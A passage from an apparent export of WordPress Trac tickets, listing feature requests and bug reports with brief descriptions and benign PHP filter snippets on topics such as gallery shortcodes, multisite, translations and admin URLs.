'') Error: Call to undefined function wp_rel_ugc() /var/www/tests/phpunit/tests/formatting/WPRelUgc.php:31 8) Tests_Rel_Ugc::test_wp_rel_ugc with data set #5 ('', '') Error: Call to undefined function wp_rel_ugc() /var/www/tests/phpunit/tests/formatting/WPRelUgc.php:31 9) Tests_Rel_Ugc::test_wp_rel_ugc with data set #6 ('', '') Error: Call to undefined function wp_rel_ugc() /var/www/tests/phpunit/tests/formatting/WPRelUgc.php:31 10) Tests_Rel_Ugc::test_wp_rel_ugc with data set #7 ('', '') Error: Call to undefined function wp_rel_ugc() /var/www/tests/phpunit/tests/formatting/WPRelUgc.php:31 11) Tests_Rel_Ugc::test_wp_rel_ugc with data set #8 ('', '') Error: Call to undefined function wp_rel_ugc() /var/www/tests/phpunit/tests/formatting/WPRelUgc.php:31 12) Tests_Rel_Ugc::test_append_ugc_with_valueless_attribute Error: Call to undefined function wp_rel_ugc() /var/www/tests/phpunit/tests/formatting/WPRelUgc.php:81 ERRORS! Tests: 9960, Assertions: 44191, Errors: 12, Skipped: 11. }}} **Patch** Should I include changes to the `package-lock.json` even though I made no changes to the dependencies in `package.json`? " dhurlburtusa Future Releases 54554 Allow returning content for wp_dropdown_roles() Role/Capability normal normal Future Release enhancement new dev-feedback 2021-12-02T07:19:01Z 2022-09-19T21:29:10Z Currently wp_dropdown_roles() function is set to echo the content instead of the option to echo or return the content. Similar wp_dropdown_* functions allows to echo or not the content. nithi22 Future Releases 35476 Allow posts to be filtered before return when `fields` parameter is used with `WP_Query` adamsilverstein* Query normal normal Awaiting Review enhancement accepted close 2016-01-15T16:46:59Z 2023-09-19T21:10:23Z "Right now, when the '''fields''' parameter is used with '''WP_Query''' (""ids"" or ""id=>parent""), the returned posts are not filterable at all. Later in WP_Query, the_posts can be used to filter returned posts. This functionality should be mimicked with fields queries. The use case for this is in plugins that bypass MySQL in WP Query (Elasticsearch). Fields queries right now can not be bypassed. Patch attached." tlovett1 Future Releases 31136 Allow plugin authors to register an additional 'Uninstall Notification' plugin header and to display back to the user during plugin uninstall flow Plugins normal normal Future Release enhancement new needs-unit-tests 2015-01-26T06:14:19Z 2017-02-05T09:58:14Z "In wp-admin/plugins.php wordpress displays to the user information about the plugins you are attempting to uninstall. Currently it only displays the name of the plugin name ($plugin[ 'Name' ]) and the plugin author ($plugin[ 'AuthorName' ]). In V4.1 this output is generated around lines 289-304. Is it possible to add another field that contains a short piece of information from the plugin author, that can be presented to the user for each plugin? The plugin would need to register this information with wordpress when it was installed or updated. Specifically, I envisage this being used for details that the user might need to follow to preserve any data that they might have before they actually delete the plugin. An example string that I can see being used by a plugin: If you wish to uninstall without losing your data, see the details at http://example.com/plugin-uninstall. Notes: - Such a string should of course be optional to preserve backward compatibility. - Appropriate filtering and length checks should be done on the string to ensure that the uninstall plugin UI isn't easily broken or disturbed. This avoids the plugin author filling the field with a string that stops the user from being unable to uninstall the plugin." cefiar Future Releases 30909 Allow passing ID for comment_form container and title Comments normal normal defect (bug) new dev-feedback 2015-01-05T13:01:56Z 2019-06-04T19:27:27Z "Right now, there's a `div` hardcoded with `#respond` and a `h3` hardcoded with `reply-title`. These make it hard for the comment form to be used on archive pages, as they assume the comment form is only ever output on single pages. (There are other IDs output in the form, however these are controllable through `id_form` and `id_submit`)" rmccue Future Releases 38925 Allow override of depth limits on comment reply link Comments 4.7 normal normal Future Release enhancement new dev-feedback 2016-11-24T06:41:07Z 2020-05-26T20:21:04Z "The core code currently hides the Reply link if a comment is at the maxDepth setting for comment nesting, but this appears to only be a constraint on the presentation. The API still allows replies through URL parameters and the REST interface, which demonstrates that there is not a functional reason for the constraint. I'm proposing that plugin authors are allowed to override this constraint by setting `$args['limit_by_depth'] = false` in a `comment_reply_link_args` filter. This requires only a minor, inconsequential change to comment-template.php per the attached patch. Note the '[https://wordpress.org/plugins/infinite-comment-replies/developers/ Infinite Comment Replies]' plugin currently achieves this by completely rewriting the reply link and thus masking everything that is handled in the core production of the link. The proposal above is a better option to achieve the same effect." TravisR Future Releases 11895 Allow more specific image size editing Media normal normal feature request new dev-feedback 2010-01-14T15:12:28Z 2019-06-04T20:01:54Z "Instead of allowing only some combinations of 'thumbnail', 'medium', 'large', 'full' I would like to have the ability to select which of these I would like to crop. So for example, only 'thumbnail' and 'medium'. With the current trunk this is not possible. I created a patch that adds this ability by changing the radio boxes of ""apply changes to"" in the image-edit page to checkboxes for each of the 4 possible sizes." frankgroeneveld Future Releases 52055 Allow modifying gallery_shortcode attributes before filtering the default HTML output. Media 2.5 normal normal Awaiting Review enhancement new dev-feedback 2020-12-13T08:52:01Z 2021-01-29T15:20:38Z "Hi there! I am an author of the Enhanced Media Library plugin, and I constantly encounter the same problem with enhancing media galleries/playlists. The problem: I need to add a parameter to the gallery (shortcode). That parameter changes the **query**, and returns another set of attachment IDs (content of the gallery). I do not need to change the **look** (HTML) of the gallery, I just need to process gallery parameters and change its content which is supposed to be displayed by a theme or a plugin **after** my plugin changed the `ids` set. So, I hook to the `shortcode_atts`. But! In the `gallery_shortcode` function we have called the `post_gallery` filter, which allows totally redefine the gallery's output (HTML) and which is used by plugins and themes for this purpose. If it was used, then the function returns its result and **all code bellow is never executed**. So, the `shortcode_atts` function is never called in case that some theme/plugin changes **just** gallery HTML. We do not have any hook prior to the `post_gallery` to make changes to the gallery's content. So, we have an option of whether to change the content **OR** the look of the gallery, which is, actually, weird. Of course, I can use the `post_gallery` and change both the content **and** the look. But in this case, a theme or a plugin cannot change the look of my content after that. I believe, that we have to separate modifying the gallery content query and the gallery output. The simplest solution (I see) is to move {{{#!php name ) { // $object->_default_query = array( 'post_status' => 'inherit', ); }}} === Current workaround === I can very easily programmatically set `show_in_nav_menus`, I can also implement the `nav_menu_meta_box_object` filter to update the value for ""post_status"" as above. But it would be a lot easier if the logic in the filter was in core. " bobbingwide Future Releases 42806 Allow installing themes in the Customizer on multisite Customize normal normal Future Release enhancement new dev-feedback 2017-12-05T17:47:40Z 2018-07-08T17:44:55Z "Currently the ""Install Themes"" section in the Customizer isn't added when using multisite. There is no technical problem with the installation process, as it still works correctly, simply by adding removing the restriction to only add the section (and enqueueing the related script) if `is_multisite()`, which I tested before opening this ticket. However, what would need to be figured out is how to deal with enabling themes, because by default an installed themes isn't enabled anywhere. And of course it would only be possible for the network administrator, but I think that would still bring a huge benefit, because right now it isn't possible in multisite at all. Here are two suggestions for possible approaches: 1. When in a multisite, there could be a notification like ""By installing a theme you also automatically enable it for this site."" Then, after the installation logic we would only need to handle that part automatically. If we go with that approach, we would need to make sure that the current user has both the `install_themes` and `manage_network_themes` capabilities. 2. When in a multisite, there could be a separate section ""Network Installed Themes"" that includes all themes installed, regardless of whether they're enabled for the site. Each themes would have a button to enable/disable it for the site. That section would require the user to have the `manage_network_themes` capability. We would furthermore need to ensure that themes are transitioned from the ""Network Installed Themes"" to the existing ""Installed Themes"" section and vice-versa when they are enabled/disabled for the site. Plus, when installing a theme through the ""WordPress.org Themes"" section, the user would need to be redirected to the ""Network Installed Themes"" section with that theme pre-seleted, to easily be able to enable and preview it. There are benefits to both ways: While the first approach will be much simpler to implement, it somewhat mixes installing and enabling themes into one. The latter approach will allow more flexibility, but may be overly complex. Especially since installing themes without being able to enable them will make the process useless in multisite, I think I prefer the first approach. Maybe a mix of both could be the right way too, where we start with implementing the first approach as a first iteration (that could even be merged into core as that), but keeping it future-compatible to possibly add a dedicated ""Network Installed Themes"" section later." flixos90 Future Releases 47210 Allow html on site health titles and description Site Health 5.2 normal minor Awaiting Review enhancement new dev-feedback 2019-05-10T07:37:41Z 2022-09-05T20:27:28Z "Hello there, In /wp-admin/site-health-info.php#L115 we have this: {{{ }}} So we don't allow HTML content ? why!? I propose the usage of wp_kses_* to allow clean html content. Also line#141 we have this: {{{ printf( '

    %s

    ', $details['description'] ); }}} We clearly allow any html, so I propose to sanitize using wp_kses_* too, we don't want embed/iframe/script here right? Thank you for your feedback." juliobox Future Releases 22921 Allow get_users() to return array of values via 'fields' parameter Users 3.5 normal normal enhancement new dev-feedback 2012-12-13T17:39:24Z 2021-04-14T13:24:16Z "Currently, the `'fields'` parameter in the arguments array for `get_users()` only accepts either an array of user data fields, or the string `'all'`. Both of these options cause `get_users()` to return an array of object comprised of the specified user data. Passing any other string value to `'fields'` causes `get_users()` to return an array of user IDs. Per the Codex: > Array of objects, '''except when fields specifies a single field to be returned, then an array of values is returned'''. If fields is set to all_with_meta, it will return an array of WP_User objects. This statement appears to be untrue, but would be incredibly useful if it were true. Patch adds this functionality to `get_users()`. Potentially related: #18581" chipbennett Future Releases 42725 Allow gender specific translations I18N normal normal Awaiting Review enhancement new dev-feedback 2017-11-28T07:50:52Z 2020-08-03T21:34:39Z "For years, the WordPress translators community has needed to resort to '''painful compromises''' for languages with grammatical gender, where women are often discriminated by default. From strings like `Lead Developer` to simply `Author` or `Editor`, some languages will always refer to these as males, regardless of the user self-identification. While modern English grammar is exceptionally capable of being gender neutral, many other languages do not share this trait. Forcing all languages to adopt a gender-neutral grammar, even when they're not capable of it, diminishes the appeal of WordPress to non-English speaking users, especially women - because in almost all languages, pseudo gender-neutral grammar just uses the male form. This ticket is a tracking ticket for the various tasks needed to allow for gender-specific translations '''How gender specific translations will work with gettext''' - We will modify some of the existing translations functions (in a backward compatible way) to accept an optional user gender value. - When this happens, the POT generation tools will create 3 different strings, differentiated by a specific context. - On output, the correct translation will be loaded based on the value of the gender property '''What needs to be done''' - Introduce a user profile field to store users' gender and a `get_user_gender()` function. See #42900 - Add unit tests to current translation functions - Add an optional `options` parameter to `__()`, `_x()`, `_n()`, `_nx()` that will be used to pass the gender to the translation functions - Update documentation - Update GlotPress to group translations. ---- '''Notes:''' - This ticket originally included proof-of-concept patches. It has since been rewritten to reference other tickets to tackle the various tasks. - The details of the implementation were discussed during contributor day at WCUS 2017. Big thanks to @gregross, @johnbillion, @nullbyte for making this happen, and thanks to @nacin for his input. - Major props to @glueckpress for being a driving force in creating this with his [https://wordpress.tv/2017/06/27/caspar-hubinger-big-little-shame-a-tale-of-empowered-user-experience-through-localisation/ WC Europe 2017 talk]. " yoavf Future Releases 42326 Allow for user deletion in multisite Users 3.0 normal normal Awaiting Review enhancement new needs-unit-tests 2017-10-24T18:30:56Z 2017-10-24T21:19:24Z When multisite is enabled, it is impossible to completely delete user a user. A user is only removed from a site. However, if a user is has no sites on the network, then it should be safe to remove them. spacedmonkey Future Releases 46134 Allow filtering of `$header` object in `get_header_image_tag()` function (for custom header image override) Media 5.0.3 normal normal Future Release enhancement new dev-feedback 2019-01-29T14:38:10Z 2022-01-20T15:50:13Z "Currently, when trying to override custom header image, it is only possible to filter header image URL (via `theme_mod_header_image` [https://developer.wordpress.org/reference/hooks/theme_mod_name/ filter hook]) or the actual image [https://developer.wordpress.org/reference/hooks/get_header_image_tag/ output HTML] in [https://developer.wordpress.org/reference/functions/get_header_image_tag/ get_header_image_tag()] function. It would be beneficial to allow filtering also the `$header` object of `get_header_image_tag()` function: in case of override via theme code we can set not only an image URL, but an image attachment ID too. That way the `get_header_image_tag()` function can do better job with image overrides (such as setting correct image `srcset` and `sizes` attributes and also [https://core.trac.wordpress.org/ticket/46124 the image alt text])." webmandesign Future Releases 22075 Allow custom attributes to be set in `wp_get_attachment_link` Media 3.4 normal normal enhancement new needs-unit-tests 2012-10-02T04:29:05Z 2019-06-04T20:03:52Z "I answered a [http://wordpress.stackexchange.com/questions/65982 question] not so long ago on [http://wordpress.stackexchange.com/ WordPress StackExchange]. There I saw the need on a filter for `wp_get_attachment_link()` to allow the developer to add or remove attributes to the HTML without having to use a regex on it or creating the `a` tag again. So I've done this small patch with changes to apply this enhancement to the function." webord Future Releases 48536 Allow cmd/ctrl-enter to submit comment forms in wp-admin davidbaumwald* Comments normal normal Future Release enhancement accepted dev-feedback 2019-11-08T12:02:30Z 2020-02-10T19:19:27Z "This is a follow-up on #41545 which says: > I think it'd be a nice enhancement for comment forms in both the admin and front end to submit this way. However, the r45790 introducing the feature does so only for frontend. Submitting comment by pressing ctrl/cmd + 'enter' does not seem to be working in wp-admin. It would be cool if the new feature could be added to wp-admin as well." david.binda Future Releases 54829 Allow classic themes to be optionally block themes if 'templates' and 'parts' folders exists Themes 5.9 normal normal Future Release enhancement new dev-feedback 2022-01-15T18:37:03Z 2022-09-13T08:02:23Z "Hello! I have created folders 'templates' and 'parts' inside classic WordPress theme folder (and 'index.html' file) as noted here: [https://developer.wordpress.org/block-editor/how-to-guides/themes/block-theme-overview/]. This automatically converts classic theme to a block theme. But I want to this conversion was optionally - depending of theme's settings. I was able to create two filters. First filter will disable 'Appearance -> Editor' admin menu item and return 'Appearance -> Customize' menu item. {{{ if ( ! function_exists( 'disable_block_dirs' ) ) : function disable_block_dirs( $path, $file ) { //Custom logic to check settings to make block theme from classic theme here: if ( 'templates/index.html' === $file ) { $path = 'SOME_NOT_EXISTING_PATH'; } return $path; } endif; add_filter( 'theme_file_path', 'disable_block_dirs', 10, 2 ); }}} This filter is used in the '**wp-includes/class-wp-theme.php**' in the **public function get_file_path**, which is used in the **public function is_block_theme** Can we patch this file to add some filter **public function is_block_theme** that we could hook to before returning true or false? Second filter is more harmful. It will disable using custom HTML block templates on the front end. But it can be potentially very harmful because it's changing theme_root folder for the WordPress itself. {{{ if ( ! function_exists( 'disable_block_dirs_second' ) ) : function disable_block_dirs_second( $path ) { //Custom logic to check settings to make block theme from classic theme here before return: return 'SOME_NOT_EXISTING_PATH'; } endif; add_filter( 'theme_root', 'disable_block_dirs_second'); }}} This filter is used in the '**wp-includes/block-template-utils.php**' in the **function get_block_theme_folders** Can we patch this file to add some filter to the **get_block_theme_folders** function to filter array that this function is returning that we could hook to? --- Anyway now '**get_block_theme_folders**' and '**wp_get_theme()->is_block_theme**' are working independent from each other that does not make any sense. This should be fixed, I guess. Hope this make sense. Best regards! " exstheme Future Releases 35912 Allow changing network URL scheme Networks and Sites normal normal enhancement new dev-feedback 2016-02-23T02:37:42Z 2019-06-04T20:55:37Z "Right now, it's not possible to convert a network from HTTP to HTTPS. The normal way to enforce HTTPS on a site is to change the URLs for the site, but with multisite, this has to be done via the Network Admin. However, the URL isn't editable at all for the main site on the network, so it's not possible to edit it. Attached patch allows setting only the scheme for the main site. However, this does have a big question attached: should updating the scheme for the network update it across all sites? If so, should it only update from HTTP -> HTTPS, or vice versa as well?" rmccue Future Releases 45471 Allow caching of parse_blocks results francina Cache API 5.0 normal normal Future Release enhancement assigned dev-feedback 2018-12-03T12:08:15Z 2023-03-29T14:48:39Z "A *lot* of Gutenberg implementations are going to have to parse the blocks in a post. Core itself already parses the blocks on output, but also when trimming an excerpt in `excerpt_remove_blocks`. All this parsing is done with `parse_blocks`. Unfortunately, the only thing passed to `parse_blocks` right now is a string, with no way of caching it. My suggestion would be to add a cache key to the `parse_blocks` function, which defaults to false. I've attached a proposed patch to the function, if we agree on this we could then look at how to implement this in core itself." joostdevalk Future Releases 19643 Allow array for $extra_fields in request_filesystem_credentials dd32 Filesystem API 3.0 normal minor defect (bug) reviewing dev-feedback 2011-12-22T07:47:38Z 2019-06-04T19:43:38Z The current implementation for passing extra fields through request_filesystem_credentials() does not allow for an array of data to be passed. I came across this issue when trying to process a bulk installation of plugins with my plugin installation class. My patch fixes this from what I can tell and doesn't break anything that I can see from my testing. griffinjt Future Releases 46004 Allow actions based on blocks in the current content francina Bootstrap/Load normal normal Future Release enhancement assigned dev-feedback 2019-01-16T11:12:17Z 2021-05-10T18:49:18Z We're finding ourselves having to do stuff based on which blocks are in the page, and others are probably experiencing the same thing. So I think it's wise to add an action in the WP bootstrap that allows for people to do something based on which blocks will be on the page. For now only for singular pages, but as Phase 2 of Gutenberg is expanded, this should probably be expanded to other page types. joostdevalk Future Releases 56435 Alleviate translation workload I18N normal normal Awaiting Review enhancement new close 2022-08-25T02:11:29Z 2024-02-28T14:34:39Z "Checking out https://translate.wordpress.org/projects/wp/dev/af/default/ I’m scared by the unnecessary workload and strain put on: 1. Translators of WordPress Core; 2. Translators of plugins. I’d suggest taking urgent corrective action to address two issues, and to improve practice in order to prevent these issues: 1. Gettext strings in WordPress Core are very messy and don’t follow all rules set out on https://developer.wordpress.org/plugins/internationalization/how-to-internationalize-your-plugin/#best-practices-for-writing-strings: * Avoid unusual markup and unusual control characters – do not include tags that surround your text * Do not put unnecessary HTML markup into the translated string There are 150+ messages with HTML in them. Examples: {{{ #: wp-includes/js/dist/block-library.js:31347 msgid ""Commenter avatars come from Gravatar"" msgstr """" #. translators: %s: Comment author link. #: wp-includes/js/dist/block-library.js:31319 msgid ""%s says:"" msgstr """" #. translators: %s: URL to media library. #: wp-includes/widgets/class-wp-widget-media.php:501 msgid ""That file cannot be found. Check your media library and make sure it was not deleted."" msgstr """" }}} I’d prefer using two placeholders like so (uneven spacing is intentional): {{{ #. translators: 1, 2: start and end link tags. msgid ""That file cannot be found. Check your %1$s media library%2$s and make sure it was not deleted."" }}} * Try to use the same words and same symbols so not multiple strings needs to be translated Example: {{{ #: wp-activate.php:183 wp-includes/post-template.php:1728 #: wp-admin/includes/meta-boxes.php:203 msgid ""Password:"" msgstr ""Wagwoord:"" #: wp-includes/general-template.php:518 wp-login.php:1407 #: wp-admin/includes/class-wp-posts-list-table.php:1712 #: wp-admin/includes/file.php:2351 wp-admin/install.php:137 #: wp-admin/install.php:427 wp-admin/options-writing.php:167 #: wp-admin/setup-config.php:225 wp-admin/user-new.php:564 msgid ""Password"" msgstr ""Wagwoord"" }}} 2. I’d suggest to withdraw the recommendation “If there are strings in your plugin that are also used in WordPress core (e.g. ‘Settings’), you should still add your own text domain to them, otherwise they’ll become untranslated if the core string changes (which happens).” on https://developer.wordpress.org/plugins/internationalization/how-to-internationalize-your-plugin/#add-text-domain-to-strings. Trying to streamline a plugin’s Gettext strings I’m looking into the first WordPress Core PO file, that I’m using as a reference for the Portable Object Message Catalog of WordPress Core. In plugins, as many strings as possible should be synced with WordPress Core, to benefit from any existing translations. There is a caveat to this, @see link above. But those strings are very unlikely to change." anrghg Future Releases 31744 All PHP files in the root should be dummy files, pointing to wp-includes versions Upgrade/Install normal normal Awaiting Review enhancement new dev-feedback 2015-03-24T01:25:03Z 2017-02-06T12:33:46Z "I'm proposing that all of our PHP files in the WordPress root should be moved to `wp-includes`, and dummy versions put in the root that include the `wp-includes` versions of them. This will make things cleaner, and will open the door for us to do things like install a new version of WordPress in `wp-includes-8fb24cd9`, and pass a `?use-wp-includes=8fb24cd9` switch that loads that version. We could test the updated version of WordPress without touching the old version, and if it fails (WSOD, etc), we don't even have to roll back, because we haven't put the new version in `wp-includes` yet." markjaquith Future Releases 55762 All export xml files have same name Export normal normal Future Release enhancement new dev-feedback 2022-05-18T09:09:58Z 2022-06-07T14:38:53Z ​All download export files​, whether posts or pages ​give the same file name.​ Its difficult to manage if you have several of them because unlike a picture or a word file that you can open and see the contents, a user cannot see the content of the xml file until they upload into a WordPress panel. Loading the wrong file means one needs to clean up and then go back to look for the right file. I suggest each xml download from the Export panel bear the unique name of the file. ​ martiniwebb Future Releases 36188 After WordPress installation, the default category archive page is showing a 404 page Rewrite Rules 4.2 normal normal Future Release defect (bug) new dev-feedback 2016-03-09T19:17:14Z 2017-12-06T22:20:49Z "Steps to reproduce the issue: 1. Install WordPress 2. Log to the back-end 3. Go to Post -> Categories and click on the ""view"" link of the default category. => You get a 404 page Now, if you visit Settings -> Permalinks, the default category archive page is showing correctly. This issue might be related to #20171" strategio Future Releases 56176 After updating WP to 6.0, updating a(ny) pluging causes site to be stuck in maintenance mode. Plugins 6.0 normal major Awaiting Review defect (bug) new dev-feedback 2022-07-08T09:01:06Z 2022-07-26T15:07:12Z I updated all my WordPress sites (5 of them) to 6.0 from 5.9.3. Now, when I update a plugin, the sites becomes stuck in maintenance mode. I have to manually remove the .maintenance file to get the site out of maintenance mode. But as soon as I update another pluging, it gets stuck again. zippy1970 Future Releases 59734 After modifying a media author, the author name is not the same in the media page and in the media list Media 6.3.2 normal normal Awaiting Review defect (bug) new dev-feedback 2023-10-25T13:48:35Z 2023-11-02T08:10:02Z I uploaded a media as administrator. Then, I changed the media author in the media page. But in the media list, the author is still administrator. camexia Future Releases 60789 Administration Email Address: Allow method to deactivate Administration normal normal Awaiting Review feature request new close 2024-03-16T01:23:43Z 2024-03-18T21:12:43Z "As a manager of many client sites, my email address is used on a lot of sites in the ""Administration Email Address"" in Settings > General. Over time, clients move to other vendors, and sometimes this happens without the opportunity to change the Administration Email Address before it is moved. In many cases, this email address remains unchanged for years, and I continue to receive software update, user account, and other emails for accounts I have no contact with, and no way to access to change the setting. This has been mentioned by other WordPress developers as well, and I believe it is a widespread problem, although one easy to dismiss on a day-to-day basis. I did a search through Trac tickets and didn't see anything like it, so I am posting this ticket in hopes that a solution can be reached. Ideally, I'd like to see a solution that includes a time-sensitive link (similar to new account registrations) that would allow the owner of the admin to click through to the link, and agree to have the email address removed as the ""Administration Email Address""." andrewhoyer Future Releases 37145 Admin submenu opens underneeth editor link tool Administration 4.5.2 low minor Future Release defect (bug) assigned dev-feedback 2016-06-22T07:00:54Z 2020-08-05T14:22:04Z "Sub menus of the admin menu opens underneath the editor's link tool. Possibly a z-index problem. [[Image(http://i.imgur.com/7PMPxb6.png)]]" Stoffe1 Future Releases 36201 Admin Pagination URLs Use Wrong Hostname Administration normal normal Future Release defect (bug) reopened dev-feedback 2016-03-10T21:18:06Z 2024-02-01T00:58:46Z "The pagination links on the posts/pages screen uses the wrong host in some cases. Particularly for my case I have a Wordpress blog installed on a separate server from my main website, but it's hosted as a subdirectory `/blog` on the main site using the `mod_proxy` Apache module. So the pagination links are coming through using the wrong host like this: http://1647760595.us-east-1.elb.amazonaws.com/wp-admin/edit.php?paged=2 It seems like these pagination links are the only ones with this issue, and I believe it's because of how they are being constructed. I've attached a patch that solves the issue for me. -Garrett" grimmdude Future Releases 28821 Admin page registered with add_menu_page() allows access through wrong URls and hightlights wrong top level menu item Administration 3.9.1 normal normal defect (bug) new dev-feedback 2014-07-10T21:05:19Z 2019-06-04T19:26:10Z "'''Steps to reproduce:''' * Add a top level admin menu page (with the plugin provided below). * Access the new top level admin menu via the menu item (bottom of menu) * Try to access it via one of the following URLs {{{ http://example.com/wp-admin/options-general.php?page=trac http://example.com/wp-admin/tools.php?page=trac http://example.com/wp-admin/admin.php?page=trac http://example.com/wp-admin/edit-comments.php?page=trac http://example.com/wp-admin/edit.php?post_type=page&page=trac http://example.com/wp-admin/upload.php?page=trac http://example.com/wp-admin/edit.php?page=trac http://example.com/wp-admin/index.php?page=trac ... etc ... // Sub menu items that have the same behavior http://vagrant.local/wp/wp-admin/plugin-install.php?page=trac http://vagrant.local/wp/wp-admin/themes.php?page=custom-header&page=trac http://vagrant.local/wp/wp-admin/themes.php?post-new.php?post_type=page&page=trac ... etc ... }}} '''Bug description:''' Every of the above links will (falsely) work and bring you to the registered page. The top level menu item will be hightlighted while the sub menu item does not exist. The following URls will work (with above bug) as well, but ''not'' highlight any menu item: {{{ http://example.com/wp-admin/edit-tags.php?taxonomy=post_tag&page=trac http://example.com/wp-admin/edit-tags.php?taxonomy=category&page=trac }}} I would not really consider this a ''""feature""''. ---- '''Test Plugin''' {{{

    Hello Trac!